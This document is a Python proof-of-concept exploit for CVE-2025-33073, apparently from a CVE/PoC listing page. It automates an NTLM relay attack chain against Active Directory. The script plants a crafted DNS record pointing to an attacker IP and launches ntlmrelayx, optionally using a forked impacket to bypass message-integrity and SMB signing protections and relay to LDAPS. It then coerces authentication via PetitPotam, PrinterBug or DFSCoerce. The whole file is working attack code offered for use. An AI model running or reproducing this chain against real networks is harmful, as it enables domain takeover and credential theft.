4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-33073.py PY
#!/usr/bin/env python3
import sys
import os
import argparse
import subprocess
import time
from pathlib import Path

# Check if we're in a virtual environment, if not try to use local venv
def ensure_venv():
    """Make the local ``venv`` packages importable and pick an interpreter.

    When the script is not already running inside a virtual environment,
    the ``site-packages`` directory of a ``venv`` folder located next to
    this file (if any) is prepended to ``sys.path``.  The function then
    verifies that ``ldap3`` can be imported.

    Returns:
        str: Path to ``venv/bin/python3`` next to this file when it exists,
        otherwise ``sys.executable``.

    Raises:
        SystemExit: With status 1 (after printing setup hints) when
            ``ldap3`` cannot be imported.
    """
    script_dir = Path(__file__).parent.absolute()
    venv_dir = script_dir / "venv"
    venv_python = venv_dir / "bin" / "python3"

    # Check if we're already in a venv
    in_venv = (hasattr(sys, 'real_prefix') or
               (hasattr(sys, 'base_prefix') and sys.base_prefix != sys.prefix))

    if not in_venv:
        # A venv keeps its packages under lib/python3.<minor>/site-packages,
        # so the versioned directory has to be discovered with a glob.  The
        # previous gate on "lib/python3/site-packages" (no minor version)
        # meant this search was normally skipped entirely.
        for site_packages in sorted(venv_dir.glob("lib/python3.*/site-packages")):
            if site_packages.is_dir():
                if str(site_packages) not in sys.path:
                    sys.path.insert(0, str(site_packages))
                break

    # Check if required packages are available
    try:
        import ldap3  # noqa: F401 - imported only to probe availability
    except ImportError:
        print("[!] Required packages not found.")
        if venv_dir.exists():
            print("[!] Virtual environment exists but packages may not be installed.")
            print("[!] Please run:")
            print(f"    source {venv_dir}/bin/activate")
            print("    pip install -r requirements.txt")
        else:
            print("[!] Please run the setup script first:")
            print("    ./setup.sh")
        print("")
        sys.exit(1)

    # Return the Python executable to use (venv's Python if available, otherwise sys.executable)
    if venv_python.exists():
        return str(venv_python)
    return sys.executable

# Ensure venv packages are available before importing other modules.
# This call runs at import time: ensure_venv() may extend sys.path and exits
# the process with status 1 when ldap3 cannot be imported.  The returned value
# is the interpreter path chosen by ensure_venv().
VENV_PYTHON = ensure_venv()

# Record name shared by every step of the chain: it is passed to dnstool.py
# as the record to add, prefixed to the domain when polling DNS, and handed to
# the nxc coerce_plus module as its listener (L=) option.
# NOTE(review): the suffix after "localhost" looks like an encoded blob; its
# exact meaning is not established anywhere in this file.
STATIC_DNS_RECORD = "localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"

def ensure_forked_impacket():
    """Check if forked impacket is available, install if not.

    The fork is detected by looking for ``--remove-mic-partial`` in the
    ``--help`` output of ``ntlmrelayx.py`` run with the local venv's
    interpreter.  If the probe fails for any reason, the fork is installed
    into that venv with pip.

    Returns:
        bool: ``True`` when the fork was detected or installed successfully,
        ``False`` when the pip installation failed.

    Raises:
        SystemExit: With status 1 when ``venv/bin/python3`` does not exist
            next to this file.
    """
    script_dir = Path(__file__).parent.absolute()
    venv_dir = script_dir / "venv"
    venv_python = venv_dir / "bin" / "python3"

    if not venv_python.exists():
        print("[!] Virtual environment not found. Please run ./setup.sh first.")
        sys.exit(1)

    # Check if forked version is available by checking for remove_mic_partial in help.
    # NOTE(review): "ntlmrelayx.py" is a relative script path, so the
    # interpreter resolves it against the current working directory rather
    # than the venv's bin directory - confirm this is the intended lookup.
    try:
        probe = subprocess.run(
            [str(venv_python), "ntlmrelayx.py", "--help"],
            capture_output=True,
            text=True,
            timeout=5
        )
    except (OSError, subprocess.SubprocessError):
        # Launch failure or timeout: treat as "fork not available" and fall
        # through to installation.  Ctrl-C and SystemExit are deliberately
        # no longer swallowed here.
        probe = None

    if probe is not None and probe.returncode == 0 and "--remove-mic-partial" in probe.stdout:
        return True

    # Forked version not available, install it
    print("[*] Forked impacket version not found. Installing...")
    try:
        subprocess.run(
            [str(venv_python), "-m", "pip", "install", "--upgrade", "git+https://github.com/decoder-it/impacket-partial-mic.git#egg=impacket"],
            check=True,
            capture_output=True,
            text=True
        )
    except subprocess.CalledProcessError as e:
        print("[!] Failed to install forked impacket version.")
        if e.stderr:
            print(f"[!] Error: {e.stderr}")
        print("[!] Please install manually: pip install git+https://github.com/decoder-it/impacket-partial-mic.git#egg=impacket")
        return False

    print("[+] Forked impacket version installed successfully.")
    return True

def run_dnstool(user, password, attacker_ip, dns_ip, dc_fqdn):
    """Add the static DNS record by running the bundled ``dnstool.py``.

    Args:
        user: Account passed to dnstool.py via ``-u``.
        password: Password passed to dnstool.py via ``-p``.
        attacker_ip: Value the record should contain (``-d``).
        dns_ip: DNS server address (``-dns-ip``).
        dc_fqdn: Positional host argument for dnstool.py; the caller may
            pass an IP address here when no FQDN is known.

    Raises:
        subprocess.CalledProcessError: If dnstool.py exits with a non-zero
            status.
    """
    print("[*] Adding malicious DNS record using dnstool.py...")
    script_dir = Path(__file__).parent.absolute()
    dnstool_path = script_dir / "dnstool.py"
    dnstool_cmd = [
        # Use the interpreter selected by ensure_venv(): the sys.path tweak
        # made in this process is not inherited by a child interpreter, so
        # sys.executable may not be able to import the venv's packages.
        VENV_PYTHON, str(dnstool_path),
        "-u", user,
        "-p", password,
        "-a", "add",
        "-r", STATIC_DNS_RECORD,
        "-d", attacker_ip,
        "-dns-ip", dns_ip,
        dc_fqdn
    ]
    subprocess.run(dnstool_cmd, check=True)
    print("[+] DNS record added.")

def wait_for_dns_record(record, dns_ip, timeout=60):
    """Poll a DNS server with ``dig`` until *record* resolves or time runs out.

    Args:
        record: Fully qualified name to query.
        dns_ip: Address of the DNS server to ask (``@dns_ip``).
        timeout: Maximum number of seconds to keep polling; converted with
            ``int()``.

    Returns:
        bool: ``True`` as soon as dig returns at least one answer line,
        ``False`` if the timeout elapses first.
    """
    timeout = int(timeout)
    print(f"[*] Waiting for DNS record {record} to propagate...")
    # Monotonic clock: immune to wall-clock adjustments while waiting.
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            result = subprocess.run(
                ["dig", "+short", record, f"@{dns_ip}"],
                capture_output=True, text=True
            )
        except (OSError, subprocess.SubprocessError) as e:
            print(f"[!] Error checking DNS record: {e}")
        else:
            # dig writes ";; ..." diagnostics (e.g. server unreachable) to
            # stdout, so non-empty output alone does not prove an answer.
            answers = [
                line for line in result.stdout.splitlines()
                if line.strip() and not line.lstrip().startswith(";")
            ]
            if result.returncode == 0 and answers:
                print("[+] DNS record is live.")
                return True
        time.sleep(2)
    print("[!] Timeout reached. DNS record not found.")
    return False

def start_ntlmrelayx(target, custom_command=None, socks=False, smb_signing=False, dc_ip=None, dc_fqdn=None, dns_ip=None):
    """Launch the ntlmrelayx listener as a child process.

    Args:
        target: Relay target passed via ``-t`` in the default mode.
        custom_command: Optional command passed via ``-c`` (default mode only).
        socks: Append ``-socks`` when true (default mode only).
        smb_signing: When true, run ``ntlmrelayx.py`` from the forked
            impacket with ``--remove-mic-partial`` against an LDAPS target
            instead of ``target``; ``custom_command`` and ``socks`` are not
            used in this mode.
        dc_ip, dc_fqdn, dns_ip: Candidates for the LDAPS target, tried in
            that order; only consulted when ``smb_signing`` is true.

    Returns:
        subprocess.Popen: Handle of the started listener.

    Raises:
        ValueError: If ``smb_signing`` is true and none of ``dc_ip``,
            ``dc_fqdn`` or ``dns_ip`` is given.
        SystemExit: With status 1 if the forked impacket cannot be made
            available.
    """
    if smb_signing:
        # Determine LDAPS target: prefer dc_ip, then dc_fqdn, then dns_ip (commonly the DC).
        # Resolved first so a missing target fails fast with a clear error
        # instead of an UnboundLocalError after the install attempt.
        ldaps_target = dc_ip or dc_fqdn or dns_ip
        if not ldaps_target:
            raise ValueError("smb_signing requires one of dc_ip, dc_fqdn or dns_ip")

        # Ensure forked impacket is available
        if not ensure_forked_impacket():
            print("[!] Cannot proceed without forked impacket version.")
            sys.exit(1)

        print("[*] Starting ntlmrelayx.py listener with --remove-mic-partial in this terminal...")
        # Format target as ldaps://FQDNDCorIP
        if not ldaps_target.startswith("ldaps://"):
            ldaps_target = f"ldaps://{ldaps_target}"
        # Use ntlmrelayx.py directly (available in venv PATH)
        cmd = ["ntlmrelayx.py", "-t", ldaps_target, "--no-multirelay", "-i", "-smb2support", "--remove-mic-partial", "--keep-relaying"]
    else:
        print("[*] Starting ntlmrelayx listener in this terminal...")
        # Use standard system impacket-ntlmrelayx
        cmd = ["impacket-ntlmrelayx", "-t", target, "-smb2support"]
        if custom_command:
            cmd.extend(["-c", custom_command])
        if socks:
            cmd.append("-socks")
    return subprocess.Popen(cmd)

def run_petitpotam(target_ip, domain, user, password, method="PetitPotam"):
    """Start the nxc ``coerce_plus`` module in the background.

    The process is launched with its output discarded and is not waited
    for; the function returns immediately.

    Args:
        target_ip: Host passed to ``nxc smb``.
        domain: Value for ``-d``.
        user: Value for ``-u``.
        password: Value for ``-p``.
        method: Value of the module's ``M=`` option.
    """
    print(f"[*] Triggering {method} coercion via nxc...")

    # Argument list instead of a shell string: values are passed verbatim,
    # so quotes, spaces or shell metacharacters in the credentials can no
    # longer break or alter the command line.
    command = [
        "nxc", "smb", target_ip,
        "-d", domain,
        "-u", user,
        "-p", password,
        "-M", "coerce_plus",
        "-o", f"M={method}", f"L={STATIC_DNS_RECORD}",
    ]

    print(f"[*] Running {method} silently in this terminal...")
    try:
        subprocess.Popen(
            command,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL
        )
    except OSError as e:
        # Without a shell a missing/unrunnable nxc raises here; report it
        # rather than crash, keeping this step best-effort as before.
        print(f"[!] Failed to launch nxc: {e}")

def main():
    """Parse the command line and run the chain step by step.

    Steps: add the DNS record, wait until it resolves, start the
    ntlmrelayx listener, trigger the coercion, then block until the
    listener exits or the user presses Ctrl-C.

    Raises:
        SystemExit: Status 2 on invalid arguments (via argparse), status 1
            when the DNS record never becomes visible.
    """
    parser = argparse.ArgumentParser(description="Ethical attack chain: dnstool + ntlmrelayx + coercion method")
    parser.add_argument("-u", "--username", required=True, help="Username (DOMAIN\\user)")
    parser.add_argument("-p", "--password", required=True, help="Password")
    parser.add_argument("-d", "--attacker-ip", required=True, help="Attacker IP (Linux/Kali machine)")
    parser.add_argument("--dns-ip", required=True, help="IP of Domain Controller (DNS)")
    parser.add_argument("--dc-fqdn", help="FQDN of the Domain Controller")
    parser.add_argument("--dc-ip", help="IP of the Domain Controller (alternative to --dc-fqdn)")
    parser.add_argument("--target", required=True, help="Target machine for NTLM relay (FQDN)")
    parser.add_argument("--target-ip", required=True, help="IP of the coercion target (for nxc)")
    parser.add_argument("--custom-command", help="Run custom command instead of secretsdump")
    parser.add_argument("--socks", action="store_true", help="Enable SOCKS proxy in ntlmrelayx")
    parser.add_argument("--smb-signing", action="store_true", help="Use ntlmrelayx.py with --remove-mic-partial for SMB signing bypass")
    parser.add_argument("-M", "--method", default="PetitPotam",
                        choices=["PetitPotam", "Printerbug", "DFSCoerce"],
                        help="Coercion method to use (default: PetitPotam)")
    args = parser.parse_args()

    # Validate that either --dc-fqdn or --dc-ip is provided
    if not args.dc_fqdn and not args.dc_ip:
        parser.error("Either --dc-fqdn or --dc-ip must be provided")

    # The coercion step needs DOMAIN and user separately.  Validate the
    # format now, before any record is added or listener started, instead
    # of failing with a ValueError halfway through the chain.
    domain, separator, user = args.username.partition("\\")
    if not (separator and domain and user):
        parser.error("--username must be in DOMAIN\\user format")

    # Determine DC identifier for DNS operations (prefer FQDN, fallback to IP)
    dc_identifier = args.dc_fqdn if args.dc_fqdn else args.dc_ip

    # Step 1: Add DNS record (static record inside)
    run_dnstool(args.username, args.password, args.attacker_ip, args.dns_ip, dc_identifier)

    # Step 2: Check if DNS record was added successfully
    if args.dc_fqdn:
        # Domain = everything after the first label of the DC's FQDN
        domain_name = ".".join(args.dc_fqdn.split(".")[1:])
    else:
        # Only an IP was given: fall back to the lower-cased DOMAIN part of
        # the username as-is.  It may be a NetBIOS name rather than the DNS
        # domain, hence the warning.
        domain_name = domain.lower()
        print(f"[*] Warning: Using inferred domain '{domain_name}' from username. If incorrect, please provide --dc-fqdn.")
    full_record = f"{STATIC_DNS_RECORD}.{domain_name}"
    if not wait_for_dns_record(full_record, args.dns_ip, timeout=60):
        print("[!] Exiting due to DNS record not being live.")
        sys.exit(1)

    # Step 3: Start ntlmrelayx listener
    ntlmrelay_proc = start_ntlmrelayx(args.target, args.custom_command, args.socks, args.smb_signing, args.dc_ip, args.dc_fqdn, args.dns_ip)
    try:
        time.sleep(5)  # Give ntlmrelayx some time to start

        # Step 4: Trigger coercion method
        run_petitpotam(args.target_ip, domain, user, args.password, args.method)

        print("[*] Exploit chain triggered.")
        print("[*] Check this terminal for output.")
        ntlmrelay_proc.wait()
    except KeyboardInterrupt:
        print("\n[*] Keyboard interrupt received. Stopping...")
    finally:
        # Stop and reap the listener on every exit path so it is neither
        # left running nor left behind as a zombie.
        if ntlmrelay_proc.poll() is None:
            ntlmrelay_proc.terminate()
            try:
                ntlmrelay_proc.wait(timeout=5)
            except subprocess.TimeoutExpired:
                ntlmrelay_proc.kill()
                ntlmrelay_proc.wait()

# Run the chain only when executed as a script, not when imported.
if __name__ == "__main__":
    main()